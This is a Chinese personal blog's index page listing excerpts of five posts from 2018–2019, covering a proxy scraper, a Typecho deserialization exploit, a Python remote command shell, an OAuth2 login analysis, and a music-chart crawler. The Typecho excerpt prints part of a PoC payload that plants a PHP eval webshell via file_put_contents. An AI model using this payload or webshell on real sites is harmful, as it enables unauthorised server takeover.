2019-03-12 HTTP代理提取&验证工具(3.12更新) HTTP代理提取&验证工具(3.12更新) 工具简介1.此工具使用python3开发.2.帮助你提取大量HTTP代理.3.帮助你验证大量HTTP代理.4.多线程操作,节省大量时间.更新日志2019.3.12优化了验证。工具截图项目地址(已经集成到代理池项目)https://github.com/k-fire/Proxy_Pool K.Fire 2019-03-12 工具,源码 92 阅读 0 评论 2019年03月12日 92 阅读 0 评论
2019-02-01 Typecho 反序列化漏洞POC Typecho 反序列化漏洞POC Typecho 版本https://github.com/typecho/typecho/releases/tag/v1.1-15.5.12-beta构造Payload<?php class Typecho_Feed{ private $_type = 'ATOM 1.0'; private $_charset = 'UTF-8'; private $_lang = 'zh'; private $_items = array(); public function addItem(array $item){ $this->_items[] = $item; } } class Typecho_Request{ private $_params = array('screenName'=>'file_put_contents(\'tc.php\', \'<?php @eval($_POST[tc]);?>\')'); private $_filter = array('a... K.Fire 2019-02-01 分享 76 阅读 0 评论 2019年02月01日 76 阅读 0 评论
2018-09-26 基于python的简单shell,可执行命令、上传文件 基于python的简单shell,可执行命令、上传文件 食用截图食用说明工具基于python 3.7。所需库(socket threading subprocess)仅有执行命令,上传文件功能,当然有能力可以自己添加。此代码不会长期维护,当然逻辑也不会很复杂。option中仅提供command和upfile两种选择。ps:存在命令执行部分乱码,才疏学浅,希望能解决。Github:已失效 K.Fire 2018-09-26 工具,源码 69 阅读 0 评论 2018年09月26日 69 阅读 0 评论
2018-07-05 详细分析某个Oauth2认证过程&Python实现 详细分析某个Oauth2认证过程&Python实现 OAuth2.0是OAuth协议的延续版本,但不向后兼容OAuth 1.0即完全废止了OAuth1.0。 OAuth 2.0关注客户端开发者的简易性。要么通过组织在资源拥有者和HTTP服务商之间的被批准的交互动作代表用户,要么允许第三方应用代表用户获得访问的权限。同时为Web应用,桌面应用和手机,和起居室设备提供专门的认证流程。2012年10月,OAuth 2.0协议正式发布为RFC 6749工具&环境FiddlerPython 3.7流程分析完整抓取登陆流程使用fidder抓取整个登陆过程;检查用户名,密码是否正确首先我们来看第2个请求:我们首先get /eams/login.action ,然后给出了一个 307 重定向 :在返回头信息里,我们可以发现存在一个location 参数。这个location是有用处的,所以我们记下它。之后会被重定向到location中那个链接,注意其中的client_id参数python实现代码:firstheaders={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60... K.Fire 2018-07-05 笔记 67 阅读 0 评论 2018年07月05日 67 阅读 0 评论
2018-06-08 网易云音乐热歌榜爬虫 网易云音乐热歌榜爬虫 爬虫将会生成一个html文件,用以保存歌曲及链接运行实例爬虫代码#python3 s0s.cc import requests import re def main(): data1=re.findall('<li><a href=\"(.*?)</li>',ret2) data4='<html><head><title>云音乐热歌榜 - 排行榜 - 网易云音乐</title><body>' for data2 in data1: data3='<li><a href="https://music.163.com/#'+data2+'</li>' data4=data4 + data3 html=data4 +'</body></html>' savefile=open('D:/hotmusic.html','wb+') savefil... K.Fire 2018-06-08 源码 84 阅读 0 评论 2018年06月08日 84 阅读 0 评论